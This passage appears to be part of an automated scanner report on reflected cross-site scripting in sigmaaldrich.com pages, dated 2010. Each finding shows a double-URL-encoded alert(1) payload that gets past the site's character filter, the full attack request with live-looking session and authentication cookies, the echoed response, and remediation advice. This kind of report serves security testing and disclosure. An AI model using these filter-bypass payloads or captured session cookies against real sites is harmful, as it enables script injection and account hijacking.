Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:39 GMT
Content-Length: 28955
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science33260";alert(1)//d3b818a82c5/your-favorite-gene-search/yfg-pbi.html","E404") ;
   </script>
...[SNIP]...

1.580. http://www.sigmaaldrich.com/life-science/your-favorite-gene-search/yfg-pbi.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/your-favorite-gene-search/yfg-pbi.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94d01%2522%253balert%25281%2529%252f%252fa84259c19b was submitted in the REST URL parameter 2. This input was echoed as 94d01";alert(1)//a84259c19b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/your-favorite-gene-search94d01%2522%253balert%25281%2529%252f%252fa84259c19b/yfg-pbi.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:41 GMT
Content-Length: 28954
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/your-favorite-gene-search94d01";alert(1)//a84259c19b/yfg-pbi.html","E404") ;
   </script>
...[SNIP]...

1.581. http://www.sigmaaldrich.com/life-science/your-favorite-gene-search/yfg-pbi.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/your-favorite-gene-search/yfg-pbi.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f873%2522%253balert%25281%2529%252f%252f61d38aeeb24 was submitted in the REST URL parameter 3. This input was echoed as 4f873";alert(1)//61d38aeeb24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/your-favorite-gene-search/yfg-pbi.html4f873%2522%253balert%25281%2529%252f%252f61d38aeeb24 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:43 GMT
Content-Length: 28955
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/your-favorite-gene-search/yfg-pbi.html4f873";alert(1)//61d38aeeb24","E404") ;
   </script>
...[SNIP]...

1.582. http://www.sigmaaldrich.com/life-science/zinc-finger-nuclease-technology.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/zinc-finger-nuclease-technology.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe8ec%2522%253balert%25281%2529%252f%252fdc9aa4fa39f was submitted in the REST URL parameter 1. This input was echoed as fe8ec";alert(1)//dc9aa4fa39f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-sciencefe8ec%2522%253balert%25281%2529%252f%252fdc9aa4fa39f/zinc-finger-nuclease-technology.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:33 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-sciencefe8ec";alert(1)//dc9aa4fa39f/zinc-finger-nuclease-technology.html","E404") ;
   </script>
...[SNIP]...

1.583. http://www.sigmaaldrich.com/life-science/zinc-finger-nuclease-technology.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/zinc-finger-nuclease-technology.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2e65%2522%253balert%25281%2529%252f%252fadb288c3908 was submitted in the REST URL parameter 2. This input was echoed as d2e65";alert(1)//adb288c3908 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/d2e65%2522%253balert%25281%2529%252f%252fadb288c3908 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:35 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/d2e65";alert(1)//adb288c3908","E404") ;
   </script>
...[SNIP]...

1.584. http://www.sigmaaldrich.com/materials-science.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ed07%2522%253balert%25281%2529%252f%252f58c74c259d was submitted in the REST URL parameter 1. This input was echoed as 4ed07";alert(1)//58c74c259d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /4ed07%2522%253balert%25281%2529%252f%252f58c74c259d HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
